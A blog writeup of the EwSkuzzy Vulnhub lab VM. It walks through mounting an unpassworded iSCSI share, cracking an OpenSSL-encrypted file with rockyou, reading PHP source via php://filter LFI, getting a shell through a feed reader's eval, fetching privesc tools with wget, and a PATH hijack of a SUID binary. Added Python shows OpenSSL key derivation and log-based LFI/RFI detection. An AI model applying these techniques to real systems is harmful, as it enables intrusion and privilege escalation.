Ewwww SCSI (EwSkuzzy @vulnhub)

Another Vulnhub VM: EwSkuzzy from @vortexau

[Screenshot]

So last evening I decided it's time for another Vulnhub. Luckily someone in #vulnhub was discussing EwSkuzzy!

As the vulnhub.com description warned that it might be problematic in VMware, I was glad that VMware Fusion imported it just fine!

The only issue I ran into was that no network interface was configured in VMware by default, so I was happy to see that single-user mode was not password protected and I could quickly swap the default interface name in /etc/network/interfaces for VMware's ens33.

flag1{unpassworded iSCSI share}

While downloading the VM I thought “skuzzy sounds like SCSI!” :D

And I was amused to get the following nmap output:

root@kali:~# nmap -p- -sC -sV 192.168.53.129

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-21 12:26 CET
Nmap scan report for 192.168.53.129
Host is up (0.00012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA)
|_ 256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA)
80/tcp open http nginx
|_http-server-header: nginx
|_http-title: Welcome!
3260/tcp open iscsi?
|_iscsi-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:DF:D6:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.26 seconds

iSCSI \o/

I have actually already found insecure iSCSI shares in pentests in the wild, so I was very curious to see whether an iSCSI share without password protection was available on this port.

Let's enumerate:

root@kali:~# iscsiadm -m discovery -t st -p 192.168.53.129
192.168.53.129:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

root@kali:~# iscsiadm -m node -p 192.168.53.129 --login --target iqn.2017-02.local.skuzzy:storage.sys0
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.53.129,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.53.129,3260] successful.

root@kali:~# mount /dev/sdb /media/temp
root@kali:~# ls /media/temp
bobsdisk.dsk flag1.txt lost+found

root@kali:/media/temp# cat flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

We've got a flag!

flag2{sensitive data in unpassworded ISCSI share}

What do we have here:

root@kali:/media/temp# mount bobsdisk.dsk /media/temp1
root@kali:/media/temp# ls /media/temp1
lost+found ToAlice.csv.enc ToAlice.eml

root@kali:/media/temp# file /media/temp1/ToAlice*
/media/temp1/ToAlice.csv.enc: openssl enc'd data with salted password
/media/temp1/ToAlice.eml: ASCII text, with very long lines

Let's see what Bob has to say to Alice:

G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

flag3{not protection encryption keys}

Okay, from Bob's mail to Alice we know:

  • Bob does not like being used as a crypto role model
  • He used symmetric crypto (openssl) to encrypt his attachment to Alice
  • His password was likely “supercalifragilisticoespialidoso”
  • This password likely also exists in the rockyou wordlist

So let's verify this:

To brute-force the password I used “bruteforce-salted-openssl” from its GitHub repo.

One git clone later:

root@kali:/opt/bruteforce-salted-openssl# bruteforce-salted-openssl -t 9 -f /usr/share/wordlists/rockyou.txt -d sha256 -c aes256 /media/temp1/ToAlice.csv.enc
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 3475548
Tried passwords per second: 868887.000000
Last tried password: supercOOl
Password candidate: supercalifragilisticoespialidoso

Supercali-BINGO!
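Why Bob's hint about `-md sha256` matters: `openssl enc` derives the AES key and IV from the password and the 8-byte salt stored in the file header with EVP_BytesToKey, and the digest is an input to that derivation, so decrypting (or brute-forcing, hence the `-d sha256` option above) with the wrong digest produces garbage even with the right password. The following Python is an added example, not code from the writeup or from bruteforce-salted-openssl; the sample file header and its salt are constructed.

```python
import hashlib

# Constructed sample: an `openssl enc -salt` file always begins with the
# 8-byte magic "Salted__", then an 8-byte random salt, then the ciphertext.
SAMPLE_SALT = bytes.fromhex("0011223344556677")          # constructed salt
SAMPLE_ENC = b"Salted__" + SAMPLE_SALT + b"\x00" * 32    # constructed body
SAMPLE_PASSWORD = b"supercalifragilisticoespialidoso"    # Bob's key from the letter


def parse_salted_header(blob: bytes) -> tuple[bytes, bytes]:
    """Split an OpenSSL salted enc file into (salt, ciphertext)."""
    if blob[:8] != b"Salted__" or len(blob) < 16:
        raise ValueError("not an OpenSSL 'Salted__' enc file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, digest: str,
                     key_len: int = 32, iv_len: int = 16) -> tuple[bytes, bytes]:
    """OpenSSL's EVP_BytesToKey with count=1, as `openssl enc` uses it.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt);
    key || iv is the first key_len + iv_len bytes of D_1 || D_2 || ...
    For aes-256-cbc that is 32 + 16 = 48 bytes: two SHA-256 blocks, or
    three MD5 blocks (MD5 was the default digest before OpenSSL 1.1.0).
    """
    material = b""
    block = b""
    while len(material) < key_len + iv_len:
        block = hashlib.new(digest, block + password + salt).digest()
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]


def derive_for_file(blob: bytes, password: bytes, digest: str) -> dict:
    """Key material the given password would produce for this file."""
    salt, ciphertext = parse_salted_header(blob)
    key, iv = evp_bytes_to_key(password, salt, digest)
    return {"salt": salt.hex(), "key": key.hex(), "iv": iv.hex(),
            "ciphertext_len": len(ciphertext)}


def digests_agree(blob: bytes, password: bytes) -> bool:
    """Same password, different -md: the derived keys never match, which is
    why the decrypt and the brute-force both had to be told sha256."""
    a = derive_for_file(blob, password, "sha256")
    b = derive_for_file(blob, password, "md5")
    return a["key"] == b["key"]


if __name__ == "__main__":
    for md in ("sha256", "md5"):
        print(md, derive_for_file(SAMPLE_ENC, SAMPLE_PASSWORD, md))
```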

Now let's look inside the CSV:

root@kali:/media/temp# openssl enc -d -aes256 -salt -in /media/temp1/ToAlice.csv.enc -out /tmp/output.csv
enter aes-256-cbc decryption password:

root@kali:/media/temp# cat /tmp/output.csv 
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Note for later how it says that flag3 is a URL. How long is this string?

flag4{beating the old php pony}

A nice decoy site on the first URL from the CSV:

[Screenshot]

There are some more decoy base64 strings in the source, but I leave those for the eager writers to document ;)

Let's look behind door no. 2:

[Screenshot]

Nice! A self-written PHP website, this looks promising! :)

Oh no he didn't:

[Screenshot]

OH NOES *shockedface*:

[Screenshot]

LFI’ception!

My guess is that $_GET['p'] ends up in a PHP include, so let's try to read some source code, php://filter style:

root@kali:/media/temp# curl http://192.168.53.129/c2444910794e037ebd8aaf257178c90b/index.php?p=php://filter/convert.base64-encode/resource=flag.php
<!DOCTYPE html>
<html>
<head>
<title>I think you're on the right track now!</title>
<style>
div.container {
width: 100%;
border: 1px solid gray;
}

header, footer {
padding: 1em;
...
...
boring, shortened
...
...
overflow: hidden;
}
</style>
</head>
<body>
<div class="container">
<header>
<h1>My great web-app!</h1>
</header>
<ul>
<ul>
	<li><a href="?p=welcome">Welcome</a></li>
</ul>
</ul>
<ul>
<ul>
	<li><a href="?p=flag">Flag</a></li>
</ul>
</ul>
<ul>
<ul>
	<li><a href="?p=party">Let's Party!</a></li>
</ul>
</ul>
<ul>
<ul>
	<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</ul>
<article>PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==</article>&nbsp;

<footer>Hack the Planet!</footer>&nbsp;

</div>
&lt;/body&gt; &lt;/html&gt;

&nbsp;

Let's look at the source of flag.php:

root@kali:/media/temp# echo "PD9waHAK...base64 string from the article element above...Cj8+Cg==" | base64 -d
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag! 
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
// 
// Well done, you're doing great so far!
// Next step. SHELL!
//
// 
// Oh. That flag above? You're gonna need it... 
?>

We've got a flag!

And another hint!

flag5{from shell over suid to root}

Last flag it is!

But first we need a shell! I like shells!

Let's look at this strange reader.php:

root@kali:/media/temp# curl http://192.168.53.129/c2444910794e037ebd8aaf257178c90b/index.php?p=php://filter/convert.base64-encode/resource=reader.php
<!DOCTYPE html>
<html>
<head>
...nothing to see here, move along...
</head>
<body>
<div class="container">
<header>
<h1>My great web-app!</h1>
</header>
<ul>
<ul>
	<li><a href="?p=welcome">Welcome</a></li>
</ul>
</ul>
<ul>
<ul>
	<li><a href="?p=flag">Flag</a></li>
</ul>
</ul>
<ul>
<ul>
	<li><a href="?p=party">Let's Party!</a></li>
</ul>
</ul>
<ul>
<ul>
	<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</ul>
<article>PD9w...base64-encoded reader.php, shortened...KfQoK</article>
<footer>Hack the Planet!</footer>
</div>
</body> </html>

[Screenshot]

Lets read it:

root@kali:/media/temp# echo "PD9w...insert long string here...KfQoK" | base64 -d
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
            $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck :) But.. You have the source anyway, right? :)
            if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
            }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) {
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

So we can probably do RFI with the feed reader URL:

http://192.168.53.129/c2444910794e037ebd8aaf257178c90b/index.php?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt
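Both tricks used in this writeup leave distinctive traces in the web server's access log: a php://filter wrapper in the p= parameter (the include used to read flag.php) and a url= parameter whose host is something other than 127.0.0.1 (the feed reader fetching a remote source). The following Python is an added detection example, not part of the writeup or of the VM; the nginx access-log lines are constructed to mirror the requests made here, and the key value is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed nginx "combined" log lines modelled on this writeup's requests.
# Client IP, sizes and user agents are made up; the key value is a placeholder.
SAMPLE_LOG = """\
192.168.53.1 - - [21/Mar/2017:13:44:24 +0100] "GET /c2444910794e037ebd8aaf257178c90b/index.php?p=welcome HTTP/1.1" 200 1170 "-" "curl/7.52.1"
192.168.53.1 - - [21/Mar/2017:13:45:02 +0100] "GET /c2444910794e037ebd8aaf257178c90b/index.php?p=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 2311 "-" "curl/7.52.1"
192.168.53.1 - - [21/Mar/2017:13:57:23 +0100] "GET /c2444910794e037ebd8aaf257178c90b/index.php?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt HTTP/1.1" 200 620 "-" "Mozilla/5.0"
192.168.53.1 - - [21/Mar/2017:14:09:07 +0100] "GET /c2444910794e037ebd8aaf257178c90b/index.php?p=reader&url=http://192.168.53.131/feed.txt&key=KEY_PLACEHOLDER HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# PHP stream wrappers that have no business appearing in an include parameter.
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|file|zip)://', re.I)
# Sources reader.php treats as trusted; anything else should stand out in the log.
LOCAL_HOSTS = {"127.0.0.1", "localhost"}


def classify_request(target: str) -> list[str]:
    """Return a list of findings for one request target (path + query)."""
    findings = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for p in qs.get("p", []):
        p = unquote(p)
        # Wrapper, traversal or absolute path in the include parameter: LFI.
        if WRAPPER_RE.match(p) or ".." in p or p.startswith("/"):
            findings.append(f"LFI: p={p}")
    for u in qs.get("url", []):
        # Compare the parsed hostname, not a string prefix; non-URL values
        # (hostname None) are flagged as well.
        host = urlsplit(unquote(u)).hostname
        if host not in LOCAL_HOSTS:
            findings.append(f"RFI/SSRF: url host={host}")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Parse access-log lines and return (timestamp, client, findings) hits."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["target"])
        if findings:
            hits.append((m["ts"], m["ip"], findings))
    return hits


if __name__ == "__main__":
    for ts, ip, findings in scan_log(SAMPLE_LOG):
        print(ts, ip, "; ".join(findings))
```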

Let's test without the key:

[Screenshot]

Now let's test a random 47-character key:

[Screenshot]

Now if only we already had a 47-character key from somewhere 🤔

Btw: I tried to brute-force the SHA-256 hash from the PHP source, but when hashcat told me that 47 characters would take >10 years, and I had no luck with rockyou.txt or linkedin.txt either, I remembered all the previous spoilers/hints:

[Screenshots of the previous hints]

Guess what? The entire flag string is 47 characters long, and with flag4{…} as the key it finally worked:

[Screenshot]

So let's provide some PHP code in the format the reader.php source expects:

[Screenshot]

And we've got a shell:

[Screenshot]

Now let's do some basic privesc enumeration:

$ cd /tmp
$ wget http://192.168.53.131/linux-privtools.tar
--2017-03-22 00:01:56-- http://192.168.53.131/linux-privtools.tar
Connecting to 192.168.53.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 133120 (130K) [application/x-tar]
Saving to: 'linux-privtools.tar'

 0K .......... .......... .......... .......... .......... 38% 29.6M 0s
 50K .......... .......... .......... .......... .......... 76% 28.6M 0s
 100K .......... .......... .......... 100% 28.5M=0.004s

2017-03-22 00:01:56 (29.0 MB/s) - 'linux-privtools.tar' saved [133120/133120]

$ tar xf linux-privtools.tar
$ chmod +x LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# 

Debug Info
thorough tests = enabled


Scan started at:
Wed Mar 22 00:05:56 ACDT 2017


### SYSTEM ##############################################
Kernel information:
Linux skuzzy 4.4.0-64-generic #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


Kernel information (continued):
Linux version 4.4.0-64-generic (buildd@lgw01-56) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017


Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


Hostname:
skuzzy

...
Lots more findings!
...

SUID files:
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup
...

Here we go, a SUID file called alicebackup!

Let's run strings on it:

$ strings /opt/alicebackup 
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
=i 
=J 
AWAVA
AUATL
[]A\A]A^A_
scp /tmp/special bob@alice.home:~
;*3$"
GCC: (Debian 6.3.0-6) 6.3.0 20170205
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6962
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
root.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

What do we have here, a call to scp without an absolute path:

scp /tmp/special bob@alice.home:~

Let's put /tmp at the front of PATH and place our own scp there:

[Screenshot]

The end…

This was a really fun VM, straightforward, with nice hints at the right moments.

Thanks a lot @vortexau!

BR
Sebastian

This entry was posted in boot2root, vulnhub.